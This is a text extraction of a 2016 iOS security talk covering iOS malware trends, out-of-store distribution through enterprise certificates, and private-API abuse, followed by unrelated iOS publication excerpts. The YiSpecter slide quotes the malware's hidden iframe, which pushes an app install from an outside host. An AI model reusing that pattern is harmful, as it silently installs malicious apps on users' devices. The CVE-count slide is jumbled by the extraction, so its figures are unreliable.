Ios: Including Ordinary Security?

Total Page:16

File Type:pdf, Size:1020Kb

Ios: Including Ordinary Security? www.dinosec.com @ dinosec iOS: including Ordinary Security? Raúl Siles Founder & Senior Security Analyst [email protected] December 2, 2016 2016 © Dino Security S.L. All rights reserved. Todos los derechos reservados. "iOS is considered to be by many in the industry one of the most secure mobile platforms" .0.1 2016 © Dino Security S.L. www.dinosec.com 2 All rights reserved. Todos los derechos reservados. Outline • iOS State-of-the-Art • Malware • Developers • Lock Screen • Digital Certificates • Software Updates • Wi-Fi • Conclusions 2016 © Dino Security S.L. www.dinosec.com 3 All rights reserved. Todos los derechos reservados. iOS State-of-the-Art 2016 © Dino Security S.L. www.dinosec.com 4 All rights reserved. Todos los derechos reservados. Market Share: Mobile Devices Q2 2015: Android: 82.8% iOS: 13.9% WP: 2.6% BB: 0.3% Others: 0.4% Consolidated trend to exceed more than 300 Reference: http://www.idc.com/prodserv/smartphone-os-market-share.jsp million units by quarter (Qx): 1,3 billions (2014) 2016 © Dino Security S.L. www.dinosec.com 5 All rights reserved. Todos los derechos reservados. Security By (CVE) Numbers Official numbers: Official numbers: • iOS 6: 197 • iOS 8: 56 • iOS after 10 years… • iOS 7: 80 • iOS 8.1: 5 • iOS 7.1: 41 • iOS 8.1.1: 9 Official –numbers?2007: iPhone 2G (iOS• … 1) • iOS 8.1.2: - Official– numbers2008: iPhone 3G (iOS 2) • iOS 8.1.3: 34 • iOS 10: 7 • iOS 8.2: 6 • iOS• iOS 10.0.1: 10:– 2009: 1 49 iPhone 3GS (iOS 3) • iOS 8.3: 58 Official numbers: • iOS• iOS 10.0.2: 10.0.1: 0 1 • iOS 8.4: 33 • iOS 10.0.2:– 2010: 0 iPhone 4 (iOS 4) + iPad 1 • iOS 8.4.1: 71 • iOS 9: 101 • wOS 3: 1 • iOS 9.0.1: - • wOS 3:– 2011: 19 iPhone 4S (iOS 5) + iPad 2 iOS 8.x: 272 • iOS 9.0.2: 1 • iOS 9.1: 49 – 2012: iPhone 5 (iOS 6) + iPad 3 & 4 & mini • iOS 9.2: 50 Official numbers: • iOS 9.2.1: 13 – 2013: iPhone 5c & 5s (iOS 7) + iPad air & mini 2 • iOS 9.3: 39 • wOS 1.0.1: 13 • iOS 9.3.1: - • wOS– 2.0:2014: 39 iPhone 6 & 6+ (iOS 8) + iPad air 2 & mini 3 • iOS 9.3.2: 39 • wOS 2.0.1: 14 • iOS 9.3.3: 46 • wOS– 2.1:2015: 30 iPhone 6S & 6S+ (iOS 9) + iPad Pro 12,9" & mini• iOS 4 9.3.4: 1 • wOS 2.2:• Apple 34 Watch & Apple Pencil • iOS 9.3.5: 3 • wOS 2.2.1: 26 • wOS– 2.2.2:2016: 26 iPhone SE + iPad Pro 9.7" + iPhone 7 & 7+ (iOS iOS10) 9.x: 342 wOS x.y: 182 6 2016 © Dino Security S.L. www.dinosec.com 6 All rights reserved. Todos los derechos reservados. Malware? 2016 © Dino Security S.L. www.dinosec.com 7 All rights reserved. Todos los derechos reservados. "If it has no name, it does not exist!" How do we identify or classify malware families and specimens if there are no anti-virus (or anti-malware) solutions for iOS? – Malware (CME) – Vulnerabilities (CVE) 2016 © Dino Security S.L. www.dinosec.com 8 All rights reserved. Todos los derechos reservados. Recent iOS Malware Trends (1/2) • “No iOS Zone” (DoS) – Malicious SSL certificates (iOS < 8.3) (Apr'15) – https://www.skycure.com/blog/ios-shield-allows-dos-attacks-on-ios-devices/ – WiFiGate: https://www.skycure.com/blog/wifigate-how-mobile-carriers-expose-us-to-wi-fi-attacks/ • XARA: Unauthorized Cross-App Resource Access on MAC OS X and iOS (Jun'15) – https://drive.google.com/file/d/0BxxXk1d3yyuZOFlsdkNMSGswSGs/view?pli=1 – http://www.imore.com/depth-look-ios-os-x-xara-vulnerabilities • KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts (Aug'15) – http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts- to-create-free-app-utopia/ (for jailbroken devices) • Masque attack(s)… – "Masque Attack: All Your iOS Apps Belong to Us" (Nov'14) • https://www.fireeye.com/blog/threat-research/2014/11/masque-attack-all-your-ios-apps-belong-to-us.html – Wirelurker (Nov'14): http://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/ – "iOS Masque Attack Revived: Bypassing Prompt for Trust and App URL Scheme Hijacking" (Feb'15) • https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html – "Three New Masque Attacks against iOS: Demolishing, Breaking and Hijacking" (Jun'15) • https://www.fireeye.com/blog/threat-research/2015/06/three_new_masqueatt.html 9 2016 © Dino Security S.L. www.dinosec.com 9 All rights reserved. Todos los derechos reservados. Recent iOS Malware Trends (2/2) • …More masque attack(s) – "iOS Masque Attack Weaponized: A Real World Look" (Aug'15) • https://www.fireeye.com/blog/threat-research/2015/08/ios_masque_attackwe.html • XcodeGhost (Sep'15 & Nov'15) – http://researchcenter.paloaltonetworks.com/2015/09/novel-malware-xcodeghost-modifies-xcode-infects-apple- ios-apps-and-hits-app-store/ – https://blog.lookout.com/blog/2015/09/20/xcodeghost/ – https://blog.lookout.com/blog/2015/09/21/xcodeghost-apps – https://blog.lookout.com/blog/2015/09/22/xcodeghost-detection/ – https://www.fireeye.com/blog/threat-research/2015/11/xcodeghost_s_a_new.html • ZergHelper: Pirated iOS App Store’s Client (…) Evaded Apple iOS Code Review (Feb'16) – http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple- ios-code-review/ • AceDeceiver: iOS Trojan Exploiting Apple DRM Design Flaws (…) (Mar'16) – http://researchcenter.paloaltonetworks.com/2016/03/acedeceiver-first-ios-trojan-exploiting-apple-drm-design- flaws-to-infect-any-ios-device/ • Pegasus: (Aug'16) – https://citizenlab.org/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/ 10 2016 © Dino Security S.L. www.dinosec.com 10 All rights reserved. Todos los derechos reservados. iOS Malware • Distributing Apps Out of the App Store • Abusing Apple Private APIs 2016 © Dino Security S.L. www.dinosec.com 11 All rights reserved. Todos los derechos reservados. Distributing Apps Out of the App Store • Apple Developer Enterprise Program (vs. Apple Developer Program) – https://developer.apple.com/programs/enterprise/ ($299/year) • Provision iOS apps for internal corporate distribution (in-house) – Enterprise certs and profiles can "only" be used for internal distribution – Technically, they can be used to install any app on any device • Violating Apple's Developer Enterprise Program terms of service – Avoid Apple's App Store vetting process • And it allows the usage of Apple private APIs (sensitive operations) • User must accept the app installation (two taps) – In iOS 9 it is required to manually trust the developer (provisioning profile) http://johannesluderschmidt.de/provision-ios-ipa-app-for-in-house-enterprise-distribution/ 2016 © Dino Security S.L. www.dinosec.com 12 All rights reserved. Todos los derechos reservados. "Two taps to rule them all" 2016 © Dino Security S.L. www.dinosec.com 13 All rights reserved. Todos los derechos reservados. Apple Developer Enterprise Distribution Requirements • Become an Apple enterprise "developer": $299/year • Generate a certificate to distribute iOS apps • Create a provisioning profile • Create the iOS app IPA file & associated Manifest file (PLIST) • Create an "itms-services" web link pointing to the Manifest – The Manifest file includes the reference to the IPA file (app) • Own a web server with a valid trusted certificate (HTTPS) • Distribute the web link: E.g. Tweet, web page, e-mail, Google dork, etc. – Real benign distribution cases in Spain and China <a href="itms-services://?action=download-manifest&url=https:// www.dinosec.com/dist/app/manifest.plist">Install this app!</a> 2016 © Dino Security S.L. www.dinosec.com 14 All rights reserved. Todos los derechos reservados. Distributing Apps Out of the App Store: iOS 8 & 9+ 2016 © Dino Security S.L. www.dinosec.com 15 All rights reserved. Todos los derechos reservados. Abusing Apple Private APIs (1/2) • Objective-C – Message dispatch mechanism to invoke method/function calls – objc_msgSend (String parameters) • Class name and method name • Not resolved statically, but at runtime (or execution time) – Obfuscated and/or encrypted – Load a library (dlopen) and access a function (dlsym) • Runtime (or NSClassFromString / NSSelectorFromString) • Apple's App Store review or vetting process – Private APIs accessing sensitive user information 2016 © Dino Security S.L. www.dinosec.com 16 All rights reserved. Todos los derechos reservados. Abusing Apple Private APIs (2/2) • "iRiS: Vetting Private API Abuse in iOS Applications" (Oct 2015) – Dynamic analysis of API calls that cannot be resolved statically ("suspicious") – 2,019 apps analyzed: 146 (7%) make use of 150 private APIs (25 critical) • SourceDNA (Oct 2015) – Using the methods described in the previous slide… – 256 apps affected (+1 million downloads) – Youmi's Ad SDK (obfuscated binary ad library) • It sends user info to a server in China – List of installed apps, current running being, serial number, hardware components (peripherals), "e-mail" Apple ID… http://www.cse.buffalo.edu/~mohaisen/classes/fall2015/cse709/docs/deng-ccs15.pdf https://sourcedna.com/blog/20151018/ios-apps-using-private-apis.html 2016 © Dino Security S.L. www.dinosec.com 17 All rights reserved. Todos los derechos reservados. YiSpecter (Oct 5, 2015) • Distributed through an Apple Enterprise Developer certificate – Evades Apple's App Store vetting process – Targets both jailbroken and non-jailbroken iOS devices <iframe src="itms-services://?action=download-manifest& url=https:// qvod.bb800.com/assets/upload/3794.plist" height=0 width=0></frame> • Extensive usage of private APIs – MobileInstallation: local app (.ipa file) install & uninstall capabilities – Claims a private entitlement key used by iOS system apps • com.apple.private.mobileinstall.allowedSPI – Monitor currently open app and displays advertisements • SpringBoardServices: SBSCopyFrontmostApplicationDisplayIdentifier • SpringBoardServices: SBSLaunchApplicationWithIdentifier – Obtains the list of installed apps: MobileInstallationLookup – Mobile Safari manipulation: default search engine, bookmarks, etc.
Recommended publications
  • How Ios 7 Stacks Up:Smartphone OS User Experience Shootout
    How iOS 7 Stacks Up: Smartphone OS User Experience Shootout a Pfeiffer Report Benchmark Project www.pfeifferreport.com @pfeifferreport Introduction Why is it that the arrival of iOS 7 Whether we like it or not, We do not look at features, we do not smartphones have become a compare cutting-edge options and is necessarily a momentous software game. Take any recent gadgets, we only look at aspects event for the smartphone top-of-the-line smartphone, and you that have a direct impact on the are likely to get a well-designed, fast, day-to-day user experience of an market? Simple: Unlike any other pleasant to use bit of hardware: fluid average, non-technical user. operating system out there, it will operation, responsive interaction, fast The aspects we have surveyed and be in the hands of millions or tens graphics. The difference of user rated are the following: experience, therefore, stems of millions of users within a few cognitive load, efficiency, almost exclusively from the customization, as well as user days after its launch. operating system, the user interface experience friction. Based on And that will make it a force to be design, the application integration, the the results from these benchmarks overall coherence. we have then established an overall reckoned with. This report compares the five Mobile Operating System User major mobile operating systems Experience Index presented at the * The question is, of course: in use today: iOS 7, iOS 6, Android , end of this document. Windows Phone 8, and Blackberry 10, The benchmarks are based on the How good is it really? and rates them in terms of user Pfeiffer Consulting Methodology experience.
    [Show full text]
  • Iphone Ios 5 Development Essentials
    iPhone iOS 5 Development Essentials i iPhone iOS 5 Development Essentials – First Edition ISBN-13: 978-1466337275 © 2011 Neil Smyth. All Rights Reserved. This book is provided for personal use only. Unauthorized use, reproduction and/or distribution strictly prohibited. All rights reserved. The content of this book is provided for informational purposes only. Neither the publisher nor the author offers any warranties or representation, express or implied, with regard to the accuracy of information contained in this book, nor do they accept any liability for any loss or damage arising from any errors or omissions. This book contains trademarked terms that are used solely for editorial purposes and to the benefit of the respective trademark owner. The terms used within this book are not intended as infringement of any trademarks. Rev 2.3p ii Table of Contents Preface ............................................................................................................................................................... xix 1. About iPhone iOS 5 App Development Essentials .............................................................................................. 1 1.1 Example Source Code ................................................................................................................................... 2 1.2 Feedback ...................................................................................................................................................... 2 2. The Anatomy of an iPhone 4S ...........................................................................................................................
    [Show full text]
  • Legal-Process Guidelines for Law Enforcement
    Legal Process Guidelines Government & Law Enforcement within the United States These guidelines are provided for use by government and law enforcement agencies within the United States when seeking information from Apple Inc. (“Apple”) about customers of Apple’s devices, products and services. Apple will update these Guidelines as necessary. All other requests for information regarding Apple customers, including customer questions about information disclosure, should be directed to https://www.apple.com/privacy/contact/. These Guidelines do not apply to requests made by government and law enforcement agencies outside the United States to Apple’s relevant local entities. For government and law enforcement information requests, Apple complies with the laws pertaining to global entities that control our data and we provide details as legally required. For all requests from government and law enforcement agencies within the United States for content, with the exception of emergency circumstances (defined in the Electronic Communications Privacy Act 1986, as amended), Apple will only provide content in response to a search issued upon a showing of probable cause, or customer consent. All requests from government and law enforcement agencies outside of the United States for content, with the exception of emergency circumstances (defined below in Emergency Requests), must comply with applicable laws, including the United States Electronic Communications Privacy Act (ECPA). A request under a Mutual Legal Assistance Treaty or the Clarifying Lawful Overseas Use of Data Act (“CLOUD Act”) is in compliance with ECPA. Apple will provide customer content, as it exists in the customer’s account, only in response to such legally valid process.
    [Show full text]
  • Enterprise Best Practices for Ios Devices On
    White Paper Enterprise Best Practices for iOS devices and Mac computers on Cisco Wireless LAN Updated: January 2018 © 2018 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public. Page 1 of 51 Contents SCOPE .............................................................................................................................................. 4 BACKGROUND .................................................................................................................................. 4 WIRELESS LAN CONSIDERATIONS .................................................................................................... 5 RF Design Guidelines for iOS devices and Mac computers on Cisco WLAN ........................................................ 5 RF Design Recommendations for iOS devices and Mac computers on Cisco WLAN ........................................... 6 Wi-Fi Channel Coverage .................................................................................................................................. 7 ClientLink Beamforming ................................................................................................................................ 10 Wi-Fi Channel Bandwidth ............................................................................................................................. 10 Data Rates .................................................................................................................................................... 12 802.1X/EAP Authentication ..........................................................................................................................
    [Show full text]
  • Ipad Voiceover (VO) Controller
    RJ Cooper & Assoc., Inc. 1-800-RJCooper 949-582-2571 Fax: 949-582-3169 Internet: www.rjcooper.com Email: [email protected] iPad VoiceOver (VO) Controller This Controller allows control over those apps that are "VoiceOver-Compliant." This is not all apps! In fact, there are probably only several hundred apps that are VO-compliant. Most are not. Fortunately, and most importantly, most of Apple's are: Camera, Photos, Music, Messages, Notes, Mail, iBooks and several others. "VoiceOver" is a technology that Apple created for Macs, then its i-devices, for blind people to be able to hear what's under their finger. To find out if an app is VO-compatible, and also, to make my VO Controller work with your i-device: 1) Settings; 2) General; 3) Accessibility (scroll down to it); 4) VoiceOver; 5) Turn it on and wait and you will hear it. Now move your finger around slowly and things under your finger will highlight and speak. To activate the selected item, double-tap anywhere on the screen (remember that!). To scroll with VO, use 3 fingers. And that's how VO is supposed to work. Now press your Home button, and launch one of your desired apps, and move your finger around. Do things get highlighted and spoken? If so, then you're good to go! If not, you can write to the developer and beg ;-) But Apple soon discoverd that blind people don't use a mouse or their finger; they use a keyboard with keyboard "shortcuts," that is combinations of keys to navigate and hear their screen.
    [Show full text]
  • Evolution of Ios New Iphone? Whats Ios? Fourteen Updates and Counting! Evolution of Ios Karina Iwabuchi & Sarah Twun-Ampofo
    Karina Iwabuchi & Sarah Twun-Ampofo Evolution of iOS New IPhone? whats iOS? fourteen updates and counting! Evolution of iOS Karina Iwabuchi & Sarah Twun-Ampofo The Apple iOS (iPhone Operating System) greatly be noted as the blueprint to all iOS systems influences many app entrepreneurs, developers after. The iPhone had ground-breaking features and companies. iOS is a core mobile operating such as Visual Voicemail, Multi-Touch Screen, system that powers all Apple products software and Integration of iTunes were considered a from the iPad to the Apple TV, the system has revolutionary advancement too. The iPhone OS been popularized due to its user friendly and 1 was a major key factor in the iOS development progressive interface which can be accredited to history, the first iPhone lacked elements that the 14 innovative updates since 2007. would become an inherent part of the iOS What is an iOS system? operating system such as Photos, Calendar, Notes, Camera, Mail, support for third-party apps, and The iOS system can be simply described as more. It offered a 3.5-in. screen, a 2-megapixel Apple’s special programming that runs specific camera and won plaudits for the then-new applications tailored to the software of their multitouch features. devices, meaning the iOS system allows for new Apple only applications and updates on their iPhone 3Gs and iOS 3 products. It is a core system that powers all In 2009 the iOS 3 system was released alongside devices from Apple iPhone, iPod, iPad, iWatch, the iPhone 3GS, a new model came with massive Apple TV and Mac.
    [Show full text]
  • Antitrust, Intellectual Property, and the Itunes Ecosystem
    533 ANTITRUST, INTELLECTU AL PROPERTY, AND THE ITUNES ECOSYSTEM: A STUDY OF THE ANTITRUST IMPLICATIONS OF APPLE’S FAIRPLAY TECHNOLOGY WITH A NOD TO THE PECULIARITIES OF • INTELLECTUAL PROPERTY WILLOW NOONAN* I. INTRODUCTION In December 2008, Apple’s iTunes online music store surpassed Wal- Mart as the largest music retailer in the world.1 In the closely related portable music player market, Apple’s iPod enjoys similar success.2 Undoubtedly, Ap- ple’s insight and innovation won much of this eminence. However, a close look at Apple’s business practices reveals some conduct that draws a suspicious eye from antitrust and intellectual property laws. The first part of this article traces the development of online music and the subsequent proliferation of copyright infringement. The next part outlines the technical details, benefits, and drawbacks of Apple’s iTunes ecosystem, a notable combination of Apple products and services. The third part undertakes a traditional antitrust analysis of Apple’s conduct and suggests the need for dee- per inquiry. The next part investigates how Apple’s conduct implicates intellec- tual property law. The fifth part reviews the doctrine of intellectual property misuse and how it might apply to Apple. The final part revisits the antitrust • 2009 IDEA Student Intellectual Property Writing Competition Winner. * Candidate for Juris Doctor, 2010, The George Washington University Law School. 1 Press Release, Apple, Inc., iTunes Store Top Music Retailer in the US (Apr. 3, 2008), http://www.apple.com/pr/library/2008/04/03itunes.html [hereinafter iTunes Store]. 2 Jessica Hodgson, Leap Year Trips Zune in Black Eye for Microsoft, WALL ST.
    [Show full text]
  • Ios4 Device Problems
    USB connection issues with iOS4 Jul 23th, 2010 Some customers reported that they've experienced odd USB connection glitches with their iPod touch, iPhone 3GS and iPhone 3G upgraded to the latest iOS 4 firmware; that did not exist with iPhone OS 3.1.3. These glitches could be no audio or intermittent connectivity to the head-units. In such cases; re-connecting, restarting, or resetting the iPhone (or iPod touch) may resolve the issue. USB connection issues may occur when connected as listed below. In this case, perform the Recovery Method(s) listed below. - Connect the iPhone (or iPod touch) to the head-unit without reset. - Connect the iPhone (or iPod touch) after link with iTunes without playback a music file at least one time. - Connect the iPhone (or iPod touch) to the head-unit during the iPhone (or iPod touch) is OFF. Recovery Method(s). Try one of the below listed recovery methods. - Reconnect the iPhone (or iPod touch) to the head-unit. - Reconnect the iPhone (or iPod touch) to the head-unit while playing back a music file. - Disconnect the iPhone (or iPod touch). Turn it off completely and then turn ON again. Then re-connect it to the head-unit. - Disconnect the iPhone (or iPod touch). Press and hold the "Sleep/Wake button" and the "Home button" together for at least ten seconds, until the Apple logo appears. After a few seconds, turn it on and reconnect to the head unit. - Restore the iPhone (or iPod touch) using the iTunes restore menu Reference information Refer to Apple Support at (http://www.apple.com/support/) for additional information.
    [Show full text]
  • FAQ for Ipad (Ios 5.X)
    FAQ for iPad (iOS 5.x) Content: 1. Connecting to CityU Wireless Local Area Network (CityU WLAN) 2. Setting up the Microsoft Exchange account (for staff only) 3. Setting up the Office365 Exchange online account 4. Setting up Blackboard Mobile client for e-Learning 5. Projecting your iPad screen 6. Looking after your iPad a. Never jailbreak your iPad b. Enable Passcode Lock c. Enable the “Find My iPad” function d. Backup your iPad frequently 7. What to do if you lost your iPad 8. Official iPad Support Site 1. Connecting to CityU Wireless Local Area Network (CityU WLAN) a) Tab “Home” and select “Settings”. 1 b) Select “Wi-Fi”. c) Turn on the “Wi-Fi” and it will auto detect for wireless networks available. Select “CityU WLAN (WPA)”. d) Enter your CityU EID and network connection password i.e. the EID and password that you use to login the campus staff/student networks. Press “Join” to establish connection. 2 e) CityU server will provide its certificate to the iPad for validation. You should see one of the following valid combinations: 1) ciias.ad.cityu.edu.hk Entrust.net Secure Server Certification Authority 2) ciias.ad.cityu.edu.hk DigiCert High Assurance EV Root CA 3) ciias1.ad.cityu.edu.hk DigiCert High Assurance EV Root CA Example: Press “Accept” if the information shown is correct, otherwise you may probably be connected to a rouge/unknown server and you should cancel the connection immediately. e) Upon successful logon, you can access the Internet via CityU WLAN. 3 Note: When Wi-Fi is turned on, your device will try to connect to the most recently used Wi-Fi network (“known” network).
    [Show full text]
  • Vmware Horizon Client for Ios Installation and Setup Guide
    VMware Horizon Client for iOS Installation and Setup Guide VMware Horizon Client for iOS 2103 VMware Horizon Client for iOS Installation and Setup Guide You can find the most up-to-date technical documentation on the VMware website at: https://docs.vmware.com/ VMware, Inc. 3401 Hillview Ave. Palo Alto, CA 94304 www.vmware.com © Copyright 2021 VMware, Inc. All rights reserved. Copyright and trademark information. VMware, Inc. 2 Contents VMware Horizon Client for iOS Installation and Setup Guide 6 1 Setup and Installation 7 System Requirements 7 System Requirements for iOS Clients 7 System Requirements for Real-Time Audio-Video 8 Smart Card Authentication Requirements 9 Touch ID Authentication Requirements 10 Face ID Authentication Requirements 11 OPSWAT Integration Requirements 11 Supported Desktop Operating Systems 12 Preparing Connection Server for Horizon Client 12 Installing Horizon Client 15 Install or Upgrade Horizon Client on an iOS Device 15 Configure Workspace ONE UEM to Deliver Horizon Client to iOS Devices 15 Using Embedded RSA SecurID Software Tokens 19 Create a Virtual Smart Card 20 Manage a Virtual Smart Card 21 Pair a Virtual Smart Card with Smart Card Middleware 21 Configure Device ID Sharing with OPSWAT 23 Configure Advanced TLS Options 23 Configure VMware Blast Options 24 Configure the Horizon Client Default View 25 Configure Horizon Client Data Sharing 25 Horizon Client Data Collected by VMware 26 2 Using URIs to Configure Horizon Client 28 Syntax for Creating vmware-view URIs 28 Examples of vmware-view URIs 31 3 Managing Remote Desktop and Published Application Connections 35 Setting the Certificate Checking Mode in Horizon Client 36 Connect to a Remote Desktop or Published Application 37 Share Access to Local Storage with Client Drive Redirection 40 Manage Saved Servers 40 Select a Favorite Remote Desktop or Published Application 41 Disconnecting From a Remote Desktop or Published Application 42 Log Off From a Remote Desktop 42 VMware, Inc.
    [Show full text]
  • Assessment with Ipad
    Assessment with iPad Online Assessments in Education High-stakes standardized assessments are commonplace in American K–12 public education. Virtually every state uses some form of these assessments to help gauge student achievement and readiness for college and career. The last decade has seen the assessment stakes raised to new levels, first through federal enactment of the No Child Left Behind Act (NCLB) in 2002, and then with a state-led effort to establish a common set of educational standards beginning in 2009, known as the Common Core State Standards. Common Core State Standards The Common Core State Standards (CCSS) articulate the English language arts and mathematics knowledge and skills that students need to graduate. They were created through a joint effort of the National Governors Association and Council of Chief State School Officers; 45 states and the District of Columbia have adopted them. CCSS are expected to strongly influence the direction of curriculum, encourage development of instructional materials aligned to them, and lead to the implementation of comprehensive assessment systems to measure student performance against them. Common Core Assessments Comprehensive assessment systems are the focus of much national attention and federal investment. The goal is for the nation’s public schools to transition to a new set of “next generation” online assessments in English language arts and mathematics that align to CCSS, beginning with the 2014–2015 school year. To accomplish this, the federal government has invested $370 million in two major state consortia—the Partnership for Assessment of Readiness for College and Careers (PARCC) and the Smarter Balanced Assessment Consortium (SBAC)—as well as three smaller consortia focused on alternative assessments for student with special needs: Assessment Services Supporting English Learners Through Technology Systems; Dynamic Learning Maps Alternate Assessment System Consortium; and National Center and State Collaborative.
    [Show full text]
  • IOS 6 Education Deployment Guide EG Edits V2
    iOS 6 Education Deployment Guide First edition Micah Baker Senior Consulting Engineer Apple Education Dan Semaya Senior Consulting Engineer Apple Education Tommy Hann Senior Consulting Engineer Apple Education Stephen Cervera Manager, National Consulting Engineers Apple Education Al Tufts Director, Field Engineering Apple Education L521437A-en_AU iOS Education Deployment Guide Contents iOS in Education 3 System Requirements 5 Preparing for Deployment 6 Preparing a staging area 6 Understanding firewall requirements 6 Discovering apps for learning 6 Contacting Apple 6 AppleCare 6 Apple factory services 8 Apple Professional Development 8 Wi-Fi Design 10 Planning for coverage and density 10 Mobile carts 12 AirPlay, AirPrint and Bonjour 13 Configuration and Management 14 Manual configuration 14 Configuration profiles 14 Mobile Device Management 15 Apple Configurator 18 Using Exchange ActiveSync 20 Choosing management tools 21 Purchasing Content 22 Credit cards and iTunes Gift Cards 22 Volume Purchase Program 22 Understanding program roles 23 Enrolling in the Volume Purchase Program 23 Using the VPP 24 Volume pricing 24 Code distribution techniques 24 Deployment Strategies 25 Understanding the tools 25 Managing documents 26 Deployment models 26 Personal ownership 27 Institutional ownership 28 Layered ownership 32 Understanding iCloud 35 Apple TV 36 Troubleshooting resources 36 Summary 38 © 2013 Apple Inc. All rights reserved. AirPlay, Apple, the Apple logo, Bonjour, iChat, iPad, iPhone, iPod, iPod touch, iTunes, Mac, Mac OS, MacBook Pro, MacBook Air and Safari are trademarks of Apple Inc., registered in the US and other countries. AirPrint is a trademark of Apple Inc. AppleCare, iCloud and iTunes Store are service marks of Apple Inc., registered in the US and other countries.
    [Show full text]